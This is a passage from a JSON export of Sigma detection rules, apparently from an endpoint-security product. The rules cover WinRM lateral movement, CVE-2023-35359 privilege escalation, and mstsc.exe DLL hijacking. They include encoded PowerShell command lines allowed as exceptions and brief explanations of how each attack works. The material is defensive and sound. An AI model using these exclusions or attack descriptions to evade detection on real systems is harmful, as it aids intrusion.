EMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA='\n # ansible.windows.win_reboot module – Reboot a windows machine\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_reboot_module.html\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBBAG8AQQBFAGMAQQBaAFEAQgAwAEEAQwAwAEEAUQB3AEIAcABBAEcAMABBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwA0AEEAWQB3AEIAbABBAEMAQQBBAEwAUQBCAEQAQQBHAHcAQQBZAFEAQgB6AEEASABNAEEAVABnAEIAaABBAEcAMABBAFoAUQBBAGcAQQBGAGMAQQBhAFEAQgB1AEEARABNAEEATQBnAEIAZgBBAEUAOABBAGMAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAHcAQQBHAFUAQQBjAGcAQgAwAEEASABrAEEASQBBAEIATQBBAEcARQBBAGMAdwBCADAAQQBFAEkAQQBiAHcAQgB2AEEASABRAEEAVgBRAEIAdwBBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBLAFEAQQB1AEEARQB3AEEAWQBRAEIAegBBAEgAUQBBAFEAZwBCAHYAQQBHADgAQQBkAEEAQgBWAEEASABBAEEAVgBBAEIAcABBAEcAMABBAFoAUQBBAHUAQQBGAFEAQQBiAHcAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBLAEEAQQBwAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A'\n\n # generic ansible\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAA*'\n\n # ansible winrm put_file()\n # https://github.com/ansible/ansible/blob/devel/lib/ansible/plugins/connection/winrm.py\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand *JABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAEMAbwBuAHQAaQBuAHUAZQAiAAoAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAdABvAHAAIgAKAFMAZQB0AC0AUwB0AHIAaQBjAHQATQBvAGQAZQAgAC0AVgBlAHIAcwBpAG8AbgAgADIACgAkAGYAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBDAHIAZQBhAHQAZQAoACQAcABhAHQAaAApAAoAJABzAGgAYQAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAJABiAHkAdABlAHMAIAA9ACAAQAAoACkAIAAjAGkAbgBpAHQAaQBhAGwAaQB6AGUAIABmAG8AcgAgAGUAbQBwAHQAeQAgAGYAaQBsAGUAIABjAGEAcwBlAAoAfQAKAHAAcgBvAGMAZQBzAHMAIAB7AAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAHAAdQB0ACkACgAkAHMAaABhADEALgBUAHIAYQBuAHMAZgBvAHIAbQBCAGwAbwBjAGsAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAAsACAAJABiAHkAdABlAHMALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAkAGYAZAAuAFcAcgBpAHQAZQAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkACgB9AAoAZQBuAGQAIAB7AAoAJABzAGgAYQAxAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABoAGEAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAGkAdABDAG8AbgB2AGUAcgB0AGUAcgBdADoAOgBUAG8AUwB0AHIAaQBuAGcAKAAkAHMAaABhADEALgBIAGEAcwBoACkALgBSAGUAcABsAGEAYwBlACgAIgAtACIALAAgACIAIgApAC4AVABvAEwAbwB3AGUAcgBJAG4AdgBhAHIAaQBhAG4AdAAoACkACgAkAGYAZAAuAEMAbABvAHMAZQAoACkACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAewAiACIAcwBoAGEAMQAiACIAOgAiACIAJABoAGEAcwBoACIAIgB9ACIACg*'\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand *QARABlAGIAdQBnAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBDAG8AbgB0AGkAbgB1AGUAIgAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAHQAbwBwACIACgBTAGUAdAAtAFMAdAByAGkAYwB0AE0AbwBkAGUAIAAtAFYAZQByAHMAaQBvAG4AIAAyAAoAJABmAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHAAYQB0AGgAKQAKACQAcwBoAGEAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQAxAEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACQAYgB5AHQAZQBzACAAPQAgAEAAKAApACAAIwBpAG4AaQB0AGkAYQBsAGkAegBlACAAZgBvAHIAIABlAG0AcAB0AHkAIABmAGkAbABlACAAYwBhAHMAZQAKAH0ACgBwAHIAbwBjAGUAcwBzACAAewAKACQAYgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGkAbgBwAHUAdAApAAoAJABzAGgAYQAxAC4AVAByAGEAbgBzAGYAbwByAG0AQgBsAG8AYwBrACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgALAAgACQAYgB5AHQAZQBzACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABmAGQALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAfQAKAGUAbgBkACAAewAKACQAcwBoAGEAMQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACQAaABhAHMAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgBpAHQAQwBvAG4AdgBlAHIAdABlAHIAXQA6ADoAVABvAFMAdAByAGkAbgBnACgAJABzAGgAYQAxAC4ASABhAHMAaAApAC4AUgBlAHAAbABhAGMAZQAoACIALQAiACwAIAAiACIAKQAuAFQAbwBMAG8AdwBlAHIASQBuAHYAYQByAGkAYQBuAHQAKAApAAoAJABmAGQALgBDAGwAbwBzAGUAKAApAAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAHsAIgAiAHMAaABhADEAIgAiADoAIgAiACQAaABhAHMAaAAiACIAfQAiAAoA*'\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand *kAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACIAQwBvAG4AdABpAG4AdQBlACIACgAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACIAUwB0AG8AcAAiAAoAUwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAAMgAKACQAZgBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AEMAcgBlAGEAdABlACgAJABwAGEAdABoACkACgAkAHMAaABhADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUwBIAEEAMQBDAHIAeQBwAHQAbwBTAGUAcgB2AGkAYwBlAFAAcgBvAHYAaQBkAGUAcgBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAkAGIAeQB0AGUAcwAgAD0AIABAACgAKQAgACMAaQBuAGkAdABpAGEAbABpAHoAZQAgAGYAbwByACAAZQBtAHAAdAB5ACAAZgBpAGwAZQAgAGMAYQBzAGUACgB9AAoAcAByAG8AYwBlAHMAcwAgAHsACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABpAG4AcAB1AHQAKQAKACQAcwBoAGEAMQAuAFQAcgBhAG4AcwBmAG8AcgBtAEIAbABvAGMAawAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACwAIAAkAGIAeQB0AGUAcwAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACQAZgBkAC4AVwByAGkAdABlACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQAKAH0ACgBlAG4AZAAgAHsACgAkAHMAaABhADEALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJABiAHkAdABlAHMALAAgADAALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAkAGgAYQBzAGgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAcwBoAGEAMQAuAEgAYQBzAGgAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAC0AIgAsACAAIgAiACkALgBUAG8ATABvAHcAZQByAEkAbgB2AGEAcgBpAGEAbgB0ACgAKQAKACQAZgBkAC4AQwBsAG8AcwBlACgAKQAKAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgB7ACIAIgBzAGgAYQAxACIAIgA6ACIAIgAkAGgAYQBzAGgAIgAiAH0AIgAKA*'\n\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_whoami_module.html\n - '?:\\windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA'\n\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_reboot_module.html\n - '?:\\windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA'\n\n exclusion_common_commands:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /C java -version'\n - '?:\\windows\\system32\\cmd.exe /c set'\n - '?:\\Windows\\system32\\cmd.exe /C hostname'\n - '?:\\Windows\\system32\\cmd.exe /C echo ConnexionOK'\n\n exclusion_carl:\n CommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /C powershell.exe -nonInteractive -command exit [int]!( Get-Service ?CARL*? -ErrorAction SilentlyContinue )'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command if (!( Get-Service ?CARL*? -ErrorAction SilentlyContinue ) ) { Exit 1 }'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? -ErrorAction SilentlyContinue; if ($srv) { echo $srv.status } else { Exit 1 }'\n - '?:\\WINDOWS\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? -ErrorAction SilentlyContinue; if ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }'\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -nonInteractive -command $srv=Get-Service ?CARL*? -ErrorAction SilentlyContinue; if ($srv) { Write-Output $srv.name; exit 0 } else { exit 1 }'\n - '?:\\WINDOWS\\system32\\cmd.exe /C ?:\\Program Files\\Eclipse Adoptium\\jdk-*\\jre/bin/java -classpath ?:\\Users\\\\*\\bin\\rmtexe\\CARLAdminRmtexe-*.jar * -X GET http://localhost:9200/_*'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97766810-30db-4302-9d9a-ee68259b35ed",
"rule_name": "Suspicious Lateral Movement via WinRM",
"rule_description": "Detects suspicious process being spawned via WinRM (child of winrshost).\nWindows Remote Management is a common Windows service that is used by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to investigate the process created and check the network type authentication at the same time.\n",
"rule_creation_date": "2022-06-16",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "979df31d-3f12-4fdd-aa5f-44a4867cf2d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610488Z",
"creation_date": "2026-03-23T11:45:34.610491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-35359",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_cve_2023_35359_exploitation.yml",
"content": "title: File History Service CVE-2023-35359 Vulnerability Exploited\nid: 979df31d-3f12-4fdd-aa5f-44a4867cf2d4\ndescription: |\n Detects the exploitation of a local privilege escalation vulnerability in the File History Service (CVE-2023-35359).\n This vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\SYSTEM, thus granting the attacker local SYSTEM privileges.\n It is recommended to analyze the loaded DLL as well as to look for traces of malicious behavior on the host.\n Remediative actions include quarantining the DLL as well as isolating the host.\nreferences:\n - https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-35359\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/09/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-35359\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2023-35359\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n # C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc\n Image|endswith: '\\svchost.exe'\n ProcessCommandLine|contains: ' fhsvc'\n ImageLoaded|endswith: '\\msasn1.dll'\n\n filter_location:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "979df31d-3f12-4fdd-aa5f-44a4867cf2d4",
"rule_name": "File History Service CVE-2023-35359 Vulnerability Exploited",
"rule_description": "Detects the exploitation of a local privilege escalation vulnerability in the File History Service (CVE-2023-35359).\nThis vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\SYSTEM, thus granting the attacker local SYSTEM privileges.\nIt is recommended to analyze the loaded DLL as well as to look for traces of malicious behavior on the host.\nRemediative actions include quarantining the DLL as well as isolating the host.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97ac274a-41e8-4bf8-8eff-f1707706b244",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098592Z",
"creation_date": "2026-03-23T11:45:34.098594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098599Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mstsc.yml",
"content": "title: DLL Hijacking via mstsc.exe\nid: 97ac274a-41e8-4bf8-8eff-f1707706b244\ndescription: |\n Detects potential Windows DLL Hijacking via mstsc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mstsc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\explorerframe.dll'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\msctf.dll'\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\shell32.dll'\n - '\\SSPICLI.DLL'\n - '\\version.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\WKSCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97ac274a-41e8-4bf8-8eff-f1707706b244",
"rule_name": "DLL Hijacking via mstsc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mstsc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97be2bc7-8ea3-4c14-ad1e-5cee3597702b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079951Z",
"creation_date": "2026-03-23T11:45:34.079953Z",
"enabled": true,
